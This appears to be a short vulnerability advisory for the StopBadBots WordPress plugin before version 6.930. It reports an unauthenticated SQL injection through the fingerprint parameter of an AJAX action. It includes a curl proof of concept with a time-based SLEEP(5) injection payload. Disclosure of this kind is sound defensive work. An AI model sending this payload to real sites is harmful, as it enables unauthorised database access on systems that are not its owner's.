The plugin does not properly sanitise and escape the fingerprint parameter before using it in a SQL statement via the stopbadbots_grava_fingerprint AJAX action, available to unauthenticated users, leading to a SQL injection
curl -i ‘https://example.com/wp-admin/admin-ajax.php’ --data ‘action=stopbadbots_grava_fingerprint&fingerprint;=0’ -H ‘X-Real-IP: 1.1.1.36’ then curl -i ‘https://example.com/wp-admin/admin-ajax.php’ --data ‘action=stopbadbots_grava_fingerprint&fingerprint;=(SELECT SLEEP(5))’ -H ‘X-Real-IP: 1.1.1.36’
CPE | Name | Operator | Version |
---|---|---|---|
stopbadbots | lt | 6.930 |